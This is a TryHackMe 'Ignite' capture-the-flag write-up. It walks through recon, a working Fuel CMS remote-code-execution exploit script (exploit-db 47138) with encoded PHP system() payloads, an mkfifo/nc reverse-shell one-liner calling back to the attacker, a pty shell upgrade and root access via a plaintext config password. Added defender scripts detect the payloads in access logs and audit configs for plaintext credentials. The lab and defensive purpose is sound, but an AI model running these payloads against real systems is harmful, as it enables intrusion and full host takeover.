Writeup for the TryHackMe Ignite Room

The TryHackMe Ignite room is available at https://tryhackme.com/room/ignite

Reconnaissance

As always, the first thing to do is run an nmap scan of the server.

sudo nmap -sS -sV -vv -T4 x.x.x.x
  • -sS for a SYN/stealth scan
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

And we get the following

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))

Now that we know it's a web server, let's browse to the machine and see what we can find.

We know it is a web app, so let's do a scan with dirb and see if we can find any hidden files or folders that could be useful.

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

Which gives us some directories but not much else.

Exploitation

However, using searchsploit, we do find that there are some exploits available for Fuel CMS. For more information, have a look at the exploit-db page at https://www.exploit-db.com/exploits/47138

The local exploit file is available at /usr/share/exploitdb/exploits/linux/webapps. Copy the 47138.py file to your working folder.

The exploit needs some modification as the author was using Burp as a proxy. You could use Burp as a proxy yourself, or you can just edit the code so it looks like the code below. Just remember to change the x.x.x.x to the correct IP of the Ignite machine.

# Python 2 script (it uses urllib.quote). In Python 2, input() evaluates what
# you type, which is why commands have to be entered in quotation marks,
# e.g. "whoami".
import requests
import urllib

URL = "http://x.x.x.x"  # change to the IP of the Ignite machine (no trailing slash)


def find_nth_overlapping(haystack, needle, n):
    # Return the position of the n-th occurrence of needle in haystack,
    # or -1 if there are fewer than n occurrences
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')
    # URL-encoded filter value from exploit 47138, with the typed command
    # URL-encoded and inserted into it
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)

    # Print only the response text up to the second occurrence of its first
    # 20 characters, which cuts off the repeated page body after the output
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])

Then run the script with

python 47138.py

This will now give you a very limited shell. You can run any user commands you want; however, they will need to be included in quotation marks like this

"whoami"

We can create a reverse listener to get a slightly more usable shell using netcat. Open another terminal on your machine and run the following command

nc -nvlp 4444

This creates a netcat listener, waiting for a connection on port 4444.

Now, on Ignite box, run the command

"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"

This runs a shell on the Ignite box that connects back to the waiting netcat listener on your machine. For more information, visit the pentestmonkey Reverse Shell Cheat Sheet page at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Now you have a much better shell.

After running the whoami command, we see we are the user www-data. Check to see if you find any interesting files in the home directory for www-data.
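
From the defender's side, both the exploit requests and the reverse-shell command above travel through the same filter parameter of /fuel/pages/select/, so every one of them lands in the Apache access log. The Python script below is an added example, not part of the original writeup or of the Fuel CMS project: it parses combined-format access-log lines, decodes the filter value of requests to that endpoint and flags PHP-code and shell-command indicators. The log lines, IP addresses, timestamps and user agents are constructed for the example; the encoded filter values are the ones the exploit script sends for the commands used in this writeup.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access-log lines (not a real capture).
# Line 3 carries the encoded "filter" value the 47138 script sends for "id";
# line 4 carries the same wrapper around the mkfifo/nc reverse-shell command.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:12:00:01 +0000] "GET /fuel/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2020:12:00:07 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2020:12:01:13 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 1337 "-" "python-requests/2.22.0"
10.0.0.9 - - [10/Oct/2020:12:01:40 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.0.0.9%204444%20%3E/tmp/f%27%29%2b%27 HTTP/1.1" 200 1290 "-" "python-requests/2.22.0"
"""

# Apache "combined" log format: client IP, identity, user, [timestamp], "request", status, size, "referer", "user agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Things a legitimate page filter never contains
INDICATOR_RE = re.compile(
    r"\$\w+\s*\("                                              # PHP call through a variable, e.g. $a(
    r"|\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\("  # PHP execution functions
    r"|'\s*\+|\+\s*'"                                          # breaking out of a quoted PHP string
    r"|\bmkfifo\b|/bin/(?:ba)?sh\b|\b(?:nc|ncat)\s+\S+\s+\d+"  # reverse-shell plumbing
)


def filter_indicators(value):
    """Return the distinct indicator substrings found in a decoded filter value."""
    return sorted({m.group(0) for m in INDICATOR_RE.finditer(value)})


def scan_access_log(text):
    """Flag requests to the Fuel CMS page-select endpoint whose filter
    parameter contains PHP code or shell-command fragments."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith("/fuel/pages/select"):
            continue
        # parse_qs percent-decodes once; unquote again so double encoding does not hide a payload
        for raw in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
            hits = filter_indicators(unquote(raw))
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "user_agent": m.group("ua"),
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} ({f['user_agent']}): {', '.join(f['indicators'])}")
```

Run against a real log, the script reports the two requests from 10.0.0.9 and leaves the ordinary filter=about lookup alone; the python-requests user agent and the mkfifo and nc fragments in one request are what an analyst would pivot on when reconstructing the intrusion.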

Privilege Escalation

Now it is time to get root. First we can check whether we can run any commands with sudo.

sudo -l 

But we get an error message

However, the Fuel CMS configuration page says we can configure the database, so maybe there are some useful details in the database configuration. Look through the /var/www/html subfolders for the configuration file.

And it does: the file gives us the root login and password. Now we can just run the command

su root

But it is not so easy: we get an error message.

su: must be run from a terminal

However, if we run the following commands, we can get a working terminal, assuming the system has Python installed.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now let's try su again

su root

And after using the root password we found in the configuration file, we are now root. A quick visit to /root/ to find the second flag and the machine is complete.
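
The privilege escalation worked because the web application's database configuration held the root password in plain text. The script below is an added example, not part of the original writeup or of Fuel CMS, of the check a defender would run over a web root: it walks the tree, finds credential-looking assignments in PHP, INI and dotenv style config files, and reports files that contain a plaintext secret, configure the database with the root account, or are world-readable. The sample web root, its file path and the credential values are constructed for the example (the database.php location is an assumption, not taken from the writeup).

```python
import os
import re
import stat
import tempfile

# Credential-looking assignments in PHP array, INI or dotenv style, e.g.
#   $db['default']['password'] = 'x';   'password' => 'x',   DB_PASSWORD=x
SECRET_RE = re.compile(
    r"""(?P<key>\b(?:db_)?(?:password|passwd|pwd|secret|api_key|username|user)\b)"""
    r"""['"]?\s*\]?\s*=>?\s*['"]?(?P<value>[^'"\s;,)]+)['"]?""",
    re.IGNORECASE,
)
SECRET_KEYS = {"password", "passwd", "pwd", "db_password", "secret", "api_key"}
USER_KEYS = {"username", "user", "db_username", "db_user"}
CONFIG_EXT = (".php", ".ini", ".conf", ".env")


def find_credentials(text):
    """Return (key, value) pairs for non-empty credential-looking assignments."""
    return [(m.group("key"), m.group("value")) for m in SECRET_RE.finditer(text)]


def assess(path, text):
    """Return a list of problems for one config file, empty if it holds no credentials."""
    creds = find_credentials(text)
    if not creds:
        return []
    problems = []
    if any(k.lower() in SECRET_KEYS for k, _ in creds):
        problems.append("plaintext secret in config")
    if any(k.lower() in USER_KEYS and v == "root" for k, v in creds):
        problems.append("database configured with the root account (credential reuse risk)")
    if os.stat(path).st_mode & stat.S_IROTH:
        problems.append("file is world-readable")
    return problems


def audit_web_root(root):
    """Walk a web root and map each problematic config file (relative path) to its problems."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(CONFIG_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    problems = assess(path, fh.read())
            except OSError:
                continue
            if problems:
                report[os.path.relpath(path, root)] = problems
    return report


def build_sample_web_root():
    """Create a constructed web root containing a CodeIgniter-style database
    config; the path, account and password are sample values only."""
    root = tempfile.mkdtemp(prefix="webroot-")
    cfg_dir = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg_dir)
    cfg = os.path.join(cfg_dir, "database.php")
    with open(cfg, "w") as fh:
        fh.write(
            "<?php\n"
            "$db['default']['hostname'] = 'localhost';\n"
            "$db['default']['username'] = 'root';\n"
            "$db['default']['password'] = 'examplepass';\n"  # constructed value
            "$db['default']['database'] = 'fuel_schema';\n"
        )
    os.chmod(cfg, 0o644)  # readable by every local user
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello';\n")
    return root


if __name__ == "__main__":
    for rel, problems in audit_web_root(build_sample_web_root()).items():
        print(rel)
        for p in problems:
            print("  -", p)
```

Point audit_web_root at /var/www/html on a real host. A database config will always hold some credential, so the actionable findings are the second and third ones: the database should run under a dedicated low-privilege account whose password is not shared with any system user, and the file should be readable only by the web server's user and group.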
